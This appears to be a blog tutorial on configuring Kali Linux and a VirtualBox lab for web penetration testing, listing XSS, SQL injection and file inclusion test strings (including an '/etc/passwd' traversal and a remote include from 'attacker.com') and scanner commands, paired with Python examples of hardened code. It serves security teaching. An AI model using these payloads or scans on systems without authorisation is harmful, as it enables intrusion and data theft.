Kali Linux Web Penetration Testing Configuration and Techniques

Updating and Upgrading Kali Linux

Before starting web application security testing, ensure all necessary tools are up-to-date.

apt-get update
apt-get upgrade
apt-get dist-upgrade

Installing and Running OWASP Mantra

OWASP Mantra integrates Mozilla Firefox with security plugins for testing web application vulnerabilities.

apt-get install owasp-mantra-ff

Configuring Iceweasel Browser

Customize Iceweasel (Firefox variant) with essential security testing plugins:

  • Tamper Data
  • Cookies Manager+
  • Firebug
  • Hackbar
  • HTTP Requester
  • Passive Recon

Setting Up VirtualBox for Vulnerable VMs

Install VirtualBox to create isolated testing environments:

apt-get install virtualbox

Creating Vulnerable Virtual Machines

Download and import OWASP BWA (Broken Web Apps) VM for practice:

wget http://sourceforge.net/projects/owaspbwa/files/OWASP_Broken_Web_Apps_VM_1.1.1.ova

Configuring Client Virtual Machines

Download Microsoft Windows VMs for client-side testing from:

http://dev.modern.ie/tools/vms/#downloads

Network Configuration for Virtual Machines

Set up host-only networking in VirtualBox so the vulnerable VMs are reachable from the Kali host but not exposed to the outside network:

  1. Go to File > Preferences > Network
  2. Add a new host-only network (vboxnet0)
  3. Configure VM network adapters to use host-only mode

Web Application Vulnerability Identification

Cross-Site Scripting (XSS)

Test for XSS vulnerabilities by injecting script tags:

<script>alert('XSS')</script>
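The payload above only tells you that input is reflected; what matters for the fix is whether it can create new markup in the page. The following is an added example, not code from the original page: two hypothetical page templates (one reflecting input raw, one applying html.escape) and a checker that parses the rendered HTML and reports any tag or attribute beyond the template's own. The sample inputs are constructed for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs; the first is the page's XSS test string.
SAMPLE_INPUTS = [
    "<script>alert('XSS')</script>",
    '" onmouseover="alert(1)',
    "plain text",
]


def render_vulnerable(name: str) -> str:
    """Hypothetical page that reflects user input unescaped into an element
    body and an attribute value: the pattern the payload above detects."""
    return f'<p>Hello, {name}!</p><input value="{name}">'


def render_hardened(name: str) -> str:
    """Same page with output encoding: html.escape(quote=True) converts
    <, >, &, " and ' to entities, so the input cannot create new markup."""
    safe = html.escape(name, quote=True)
    return f'<p>Hello, {safe}!</p><input value="{safe}">'


class _MarkupCollector(HTMLParser):
    """Records every start tag and attribute name the browser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.attrs: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)


# Exactly the markup the template itself contributes.
EXPECTED_TAGS = ["p", "input"]
EXPECTED_ATTRS = ["value"]


def injection_detected(rendered: str) -> bool:
    """True when the rendered HTML contains any tag or attribute beyond the
    template's own, i.e. the input broke out of its intended context."""
    collector = _MarkupCollector()
    collector.feed(rendered)
    collector.close()
    return collector.tags != EXPECTED_TAGS or collector.attrs != EXPECTED_ATTRS


def audit(inputs=SAMPLE_INPUTS) -> dict:
    """Maps each input to (injected_in_vulnerable_page, injected_in_hardened_page)."""
    return {
        i: (injection_detected(render_vulnerable(i)),
            injection_detected(render_hardened(i)))
        for i in inputs
    }


if __name__ == "__main__":
    for payload, (vuln, hard) in audit().items():
        print(f"{payload!r:40} vulnerable={vuln} hardened={hard}")
```

The second sample input never contains a script tag at all; it closes the attribute and adds an event handler, which is why the check looks at attribute names as well as tags.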

SQL Injection

Test for SQL injection vulnerabilities:

' OR '1'='1
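Why that string works, and what closes the hole, is easiest to see side by side. Below is an added example (not from the original page) using an in-memory SQLite database with constructed accounts: a hypothetical login check that concatenates input into the SQL text, and the same check with bound parameters. The tautology turns the WHERE clause into `... AND password = '' OR '1'='1'`, which matches every row; the parameterised version treats the quotes as data.

```python
import sqlite3

TAUTOLOGY = "' OR '1'='1"  # the page's SQL injection test string


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """Hypothetical legacy code: untrusted input is spliced into the SQL text."""
    return (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> int:
    """Rows matched by the concatenated query (1 means login succeeds)."""
    return len(conn.execute(build_vulnerable_query(username, password)).fetchall())


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> int:
    """Same check with bound parameters: the values are passed separately from
    the statement, so quote characters inside them are never parsed as SQL."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return len(rows)


if __name__ == "__main__":
    db = make_db()
    print("query sent by vulnerable code:")
    print("  " + build_vulnerable_query("nobody", TAUTOLOGY))
    print("vulnerable rows:", login_vulnerable(db, "nobody", TAUTOLOGY))
    print("hardened rows:  ", login_hardened(db, "nobody", TAUTOLOGY))
```

The same bound-parameter pattern applies to any driver; the fix is never to escape quotes by hand but to keep the statement and the data separate.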

File Inclusion Vulnerabilities

Test for local and remote file inclusion:

../../../../etc/passwd
http://attacker.com/malicious.txt
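Both strings above probe the same weakness: an include path built from user input without confining it to the intended directory. The following is an added example, not code from the original page, of a hypothetical `resolve_include` function that refuses anything with a URL scheme (the remote inclusion case) and canonicalises the local path before checking it still lies under the include root (the traversal case). The sample include directory is created in a temporary folder for the demonstration.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional
from urllib.parse import urlparse


def build_sample_root() -> str:
    """Creates a throwaway include directory holding one constructed page."""
    root = tempfile.mkdtemp(prefix="includes_")
    Path(root, "home.txt").write_text("welcome\n")
    return root


def resolve_include(base_dir: str, requested: str) -> Optional[Path]:
    """Returns the file to include, or None if the request names a remote
    resource or would leave base_dir."""
    # Any URL scheme (http://, ftp://, php:// ...) means a remote or wrapper
    # include; refuse it outright instead of trying to sanitise it.
    if urlparse(requested).scheme:
        return None
    base = Path(base_dir).resolve()
    # resolve() collapses ".." and follows symlinks, so a link inside base
    # that points outside is caught too. An absolute request replaces base
    # when joined, and the containment check below then rejects it.
    target = (base / requested).resolve()
    try:
        inside = os.path.commonpath([str(base), str(target)]) == str(base)
    except ValueError:  # paths on different drives (Windows)
        inside = False
    return target if inside and target.is_file() else None


if __name__ == "__main__":
    root = build_sample_root()
    for req in ["home.txt", "../../../../etc/passwd",
                "http://attacker.com/malicious.txt"]:
        print(f"{req!r:40} -> {resolve_include(root, req)}")
```

An allow-list of named pages mapped to files is stronger still, because it removes the path from the request entirely; the containment check here is the minimum for code that must keep accepting a path.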

SSL/TLS Configuration Testing

Use SSLScan to check for weak encryption protocols:

sslscan 192.168.56.102

Automated Scanning Tools

Nikto

Comprehensive web server scanner:

nikto -h http://target.com -o results.html

Wapiti

Web application vulnerability scanner:

wapiti http://target.com -o wapiti_results -f html

OWASP ZAP

Integrated penetration testing tool with scanning capabilities:

  1. Configure browser to use ZAP proxy
  2. Right-click target site > Attack > Active Scan

w3af

Web application attack and audit framework:

w3af_gui

Vega

Open-source web vulnerability scanner:

vega

Metasploit Wmap

Metasploit module for web application scanning:

msfconsole
load wmap
wmap_sites -a http://target.com
wmap_run -e

Tags: Kali Linux Web Penetration Testing OWASP Security Tools Vulnerability Assessment

Posted on Thu, 02 Jul 2026 17:07:12 +0000 by dagee